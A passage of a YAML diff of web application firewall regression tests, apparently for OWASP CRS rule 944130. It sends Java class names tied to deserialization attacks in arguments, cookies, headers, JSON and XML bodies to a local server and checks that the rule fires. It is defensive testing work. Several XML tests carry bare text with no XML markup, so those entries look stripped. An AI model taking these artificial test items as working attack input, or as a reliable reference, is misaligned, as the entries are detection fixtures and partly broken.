desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-177 + desc: "Argument test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-178 + desc: "Argument name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-179 + desc: "Cookie test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-180 + desc: "Cookie name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-181 + desc: "Request header test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-182 + desc: "XML attribute value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-183 + desc: "XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-184 + desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-185 + desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-186 + desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-187 + desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-188 + desc: "Argument test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-189 + desc: "Argument name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-190 + desc: "Cookie test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-191 + desc: "Cookie name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-192 + desc: "Request header test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-193 + desc: "XML attribute value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-194 + desc: "XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-195 + desc: "Nested XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-196 + desc: "Content-Type text/plain includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-197 + desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-198 + desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-199 + desc: "Argument test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-200 + desc: "Argument name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-201 + desc: "Cookie test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-202 + desc: "Cookie name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-203 + desc: "Request header test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-204 + desc: "XML attribute value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-205 + desc: "XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-206 + desc: "Nested XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-207 + desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-208 + desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-209 + desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-210 + desc: "Argument test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-211 + desc: "Argument name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-212 + desc: "Cookie test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-213 + desc: "Cookie name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-214 + desc: "Request header test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-215 + desc: "XML attribute value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-216 + desc: "XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-217 + desc: "Nested XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-218 + desc: "Content-Type text/plain includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-219 + desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-220 + desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-221 + desc: "Argument test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-222 + desc: "Argument name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-223 + desc: "Cookie test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-224 + desc: "Cookie name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-225 + desc: "Request header test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-226 + desc: "XML attribute value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-227 + desc: "XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-228 + desc: "Nested XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-229 + desc: "Content-Type text/plain includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 